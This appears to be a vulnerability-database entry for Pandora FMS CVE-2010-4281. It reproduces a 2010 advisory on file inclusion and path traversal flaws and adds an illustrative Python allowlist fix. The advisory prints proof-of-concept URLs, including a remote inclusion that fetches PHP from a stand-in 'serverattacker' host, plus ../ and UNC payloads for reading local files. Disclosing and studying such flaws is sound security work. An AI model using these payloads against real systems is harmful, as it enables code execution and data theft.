CVE-2010-4281 - Code Injection vulnerability in Artica Pandora FMS

CVSS 7.5 - HIGH
  Attack vector: NETWORK
  Attack complexity: LOW
  Privileges required: NONE
  Confidentiality impact: PARTIAL
  Integrity impact: PARTIAL
  Availability impact: PARTIAL
Tags: network, low complexity, artica, CWE-94, exploit available

Summary

Incomplete blacklist vulnerability in the safe_url_extraclean function in ajax.php in Pandora FMS before 3.1.1 allows remote attackers to execute arbitrary PHP code by using a page parameter containing a UNC share pathname, which bypasses the check for the : (colon) character.
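As an added illustration (not Pandora FMS code), the Python below models the blacklist behaviour that the Seebug advisory further down attributes to safe_url_extraclean (strip the first scheme://, then every ':') and contrasts it with the allowlist-plus-containment check a maintainer would use for an include parameter. The filter model, the install path and the function names are assumptions drawn from the advisory's description.

```python
import os
import re
from typing import Optional

# Constructed model of the blacklist-style filter the advisory attributes to
# safe_url_extraclean: strip the first "scheme://", drop NUL, then strip ':'.
# This is an assumption based on the advisory text, not Pandora FMS's real code.
def blacklist_clean(page: str) -> str:
    page = re.sub(r'^[A-Za-z][A-Za-z0-9+.-]*://', '', page, count=1)  # only the first scheme://
    page = page.replace('\x00', '')                                    # %00 is rejected
    return page.replace(':', '')                                       # final colon strip

# Hypothetical install path, used only so the example runs offline.
CONSOLE_ROOT = '/var/www/pandora_console'

# One path component: letters, digits, '_' or '-'. No dots, so '.' and '..'
# never pass; no '/', ':' or NUL, so UNC and drive-letter forms never pass.
SEGMENT = re.compile(r'^[A-Za-z0-9_-]+$')

def allowlist_page(page: str, root: str = CONSOLE_ROOT) -> Optional[str]:
    """Map a 'page' value to the .php file it may include, or None to refuse it."""
    parts = page.split('/')
    if not all(SEGMENT.match(p) for p in parts):
        return None   # empty segments ('' from '//server/...' or a leading '/') fail too
    target = os.path.normpath(os.path.join(root, *parts)) + '.php'
    # Defence in depth: the segment rule already prevents escaping, but a
    # containment check catches any future relaxation of that rule.
    if not target.startswith(root + os.sep):
        return None
    return target

if __name__ == '__main__':
    for p in ('operation/agentes/networkmap', '//server/share/test',
              '../../../../etc/passwd', 'http://http://host/x'):
        print(f'{p!r:32} blacklist -> {blacklist_clean(p)!r:30} allowlist -> {allowlist_page(p)!r}')
```

Running it shows the modelled blacklist passing the UNC and ../ forms through untouched, while the allowlist refuses them and accepts only a plain module path under the console root.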

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Leverage Executable Code in Non-Executable Files
    An attack of this type exploits a system's trust in configuration and resource files: when the executable loads a resource (such as an image file or configuration file), the attacker has modified that file either to execute malicious code directly or to manipulate the target process (e.g. an application server) into acting on malicious configuration parameters. Since systems are increasingly interrelated, mashing up resources from local and remote sources, the likelihood of this attack is high. The attack can be directed at a client system, for example causing a buffer overrun by loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028, where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading PDF files: the attacker simply appends JavaScript to the end of a legitimate URL for a PDF (http://www.gnucitizen.org/blog/danger-danger-danger/), http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here. The client assumes it is reading a PDF, but the attacker has modified the resource and loaded executable JavaScript into the client's browser process. The attack can also target server processes: the attacker edits a resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE application server; adding the role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when it is manipulated, the attacker gains full control.
  • Manipulating User-Controlled Variables
    This attack targets user-controlled variables (DEBUG=1, PHP globals, and so forth). An attacker can override environment variables by leveraging user-supplied, untrusted query variables that the application server uses directly without any data sanitization. In extreme cases, the attacker can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.

Exploit-Db

description: Pandora Fms <= 3.1 Path Traversal and LFI. CVE-2010-4281, CVE-2010-4282, CVE-2010-4283. Webapps exploit for php platform
file: exploits/php/webapps/15643.txt
id: EDB-ID:15643
last seen: 2016-02-01
modified: 2010-11-30
platform: php
published: 2010-11-30
reporter: Juan Galiana Lara
source: https://www.exploit-db.com/download/15643/
title: Pandora Fms <= 3.1 Path Traversal and LFI
type: webapps

Packetstorm

data source: https://packetstormsecurity.com/files/download/96259/pandorafms-sqltraversal.txt
id: PACKETSTORM:96259
last seen: 2016-12-05
published: 2010-12-01
reporter: Juan Galiana Lara
source: https://packetstormsecurity.com/files/96259/Pandora-FMS-Command-Injection-SQL-Injection-Path-Traversal.html
title: Pandora FMS Command Injection / SQL Injection / Path Traversal

Seebug

bulletinFamily: exploit
description:
  [+] Introduction
  Pandora FMS (Pandora Flexible Monitoring System) is a software solution for monitoring computer networks. It allows monitoring, in a visual way, the status and performance of several parameters from different operating systems, servers, applications and hardware systems such as firewalls, proxies, databases, web servers or routers. It can be deployed on almost any operating system. It features remote monitoring (WMI, SNMP, TCP, UDP, ICMP, HTTP...) and it can also use agents; an agent is available for each platform. It can also monitor hardware systems with a TCP/IP stack, such as load balancers, routers, network switches, printers or firewalls. This software has several servers that process and get information from different sources: a WMI server for gathering remote Windows information, a predictive server, a plug-in server which makes complex user-defined network tests, an advanced export server to replicate data between different sites of Pandora FMS, a network discovery server, and an SNMP trap console. Released under the terms of the GNU General Public License, Pandora FMS is free software.

  5) Path Traversal:

  5.1 - PHP File Inclusion (RFI/LFI: Remote/Local File Inclusion) - CVE-2010-4281, CVE-2010-4282 - CVSS 8.5/10
  The 'page' parameter of ajax.php does not properly sanitize user-supplied input. The function safe_url_extraclean filters the ':' character, so the string "http://" cannot be used to build URLs, but it allows the '/' character, and an attacker could reference remote resources via Windows UNC paths, using //servername//resource/file. Note that the first check in safe_url_extraclean filters '://', so that check alone can be bypassed easily with http://http://url, since it only strips the first protocol://. However, the last preg_replace strips the ':' character.
  Proof of concept:
  UNC: http://servername/pandora_console/ajax.php?page=//server/share/test
  ajax.php also allows including any PHP file on the disk filesystem:
  http://servername/pandora_console/ajax.php?page=../../../../../directory/file
  The %00 character is not allowed because of the safe_url_extraclean filtering, so it is not possible to include files other than PHP files, but the '.' and '/' characters are still allowed.

  5.2 - PHP File Inclusion (RFI: Remote File Inclusion) - CVE-2010-4283 - CVSS 7.9/10
  An attacker can inject arbitrary PHP code and execute it remotely because the argv[1] parameter is not filtered in the file pandora_diag.php.
  PoC: http://servername/pandora_console/extras/pandora_diag.php?argc=2&argv[1]=http://serverattacker/salsa.php%00
  Note: this issue needs register_globals set to On to be exploitable.

  5.3 - Path traversal & Local file inclusion vulnerabilities - CVE-2010-4282 - CVSS 6.8/10
  An attacker can include arbitrary files from the filesystem via the id parameter in the file pandora_help.php.
  Snippet of vulnerable code:
    24 $id = get_parameter ('id');
    25
    26 /* Possible file locations */
    27 $files = array ($config["homedir"]."/include/help/".$config["language"]."/help_".$id.".php",
    28     $config["homedir"].ENTERPRISE_DIR."/include/help/".$config["language"]."/help_".$id.".php",
    29     $config["homedir"].ENTERPRISE_DIR."/include/help/en/help_".$id.".php",
    30     $config["homedir"]."/include/help/en/help_".$id.".php");
    31 $help_file = '';
    32 foreach ($files as $file) {
    33     if (file_exists ($file)) {
    34         $help_file = $file;
    35         break;
    36     }
    37 }
    ...
    62 require_once ($help_file);
  Proof of concept: http://servername/pandora_console/general/pandora_help.php?id=/../../../../../../../boot.ini%00
  This bug is platform dependent; you can read more at http://seclists.org/fulldisclosure/2010/Jul/137. It only works on Windows systems: an attacker can include local files using ../ sequences because the id parameter is not filtered. If magic_quotes_gpc is Off, arbitrary files such as boot.ini can be included using the NULL character (%00); if not, only PHP files are allowed.

  5.4 - Path traversal & Arbitrary write and delete files - CVE-2010-4282 - CVSS 8.0/10
  In the file operation/agentes/networkmap.php the 'layout' parameter is handled in an insecure way and is used to write and delete files on the filesystem. An attacker could use this parameter to write to arbitrary paths and even remove files.
  Snippet of vulnerable code:
    32 $layout = (string) get_parameter ('layout', 'radial');
    ...
    137 $filename_map = $config["attachment_store"]."/networkmap_".$layout;
    138 $filename_img = "attachment/networkmap_".$layout."_".$font_size;
    139 $filename_dot = $config["attachment_store"]."/networkmap_".$layout;
    ...
    157 $fh = @fopen ($filename_dot, 'w');
    158 if ($fh === false) {
    159     $result = false;
    160 } else {
    161     fwrite ($fh, $graph);
    162     $cmd = "$filter -Tcmapx -o".$filename_map." -Tpng - -o".$filename_img." ".$filename_dot;
    163     $result = system ($cmd);
    164     fclose ($fh);
    165     unlink ($filename_dot);
    166 }
    ...
    178 require ($filename_map);
  The character sequence '../' could be used to write files (because of the -o parameters on lines 162 and 163), as well as potentially to remove files (lines 157, 161 and 165) or include them (line 178). As in 5.3, this issue is only exploitable in Windows environments, for the same reason.

  [+] Impact
  An attacker can execute operating system commands, inject remote code in the context of the application, retrieve arbitrary files from the filesystem or extract any data from the database, including passwords and confidential information about the monitored network/systems. It is also possible to bypass authentication or escalate privileges to become admin, gaining full control of the web application and web server. These vulnerabilities have a high impact on the confidentiality, integrity, and availability of the system.

  [+] Systems affected
  Versions prior to and including 3.1 of Pandora FMS are affected.

  [+] Solution
  Apply the security fix for version 3.1: http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download
  Or upgrade to version 3.1.1 from http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/

  [+] Timeline
  Aug 2010: First contact with vendor
  Aug 2010: Confirmation from vendor
  Sept 2010: Second contact: SQL injection vulnerabilities
  Sept 2010: Confirmation that the fix will be released in October
  Oct 2010: PandoraFMS security patch for version 3.1 released
  Oct 2010: Request for CVE numbers
  Nov 2010: PandoraFMS version 3.1.1 released
  Nov 2010: Disclosure of this advisory

  [+] References
  Official PandoraFMS site: http://pandorafms.org/
  SourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/
  Wikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS
  Common Vulnerability Scoring System (CVSS) v2 calculator: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2
  Common Vulnerabilities and Exposures (CVE): http://cve.mitre.org/

  [+] Credits
  These vulnerabilities were discovered by Juan Galiana Lara - @jgaliana - http://juangaliana.blogspot.com/
id: SSV:70309
last seen: 2017-11-19
modified: 2014-07-01
published: 2014-07-01
reporter: Root
title: Pandora FMS <= 3.1 Path Traversal and LFI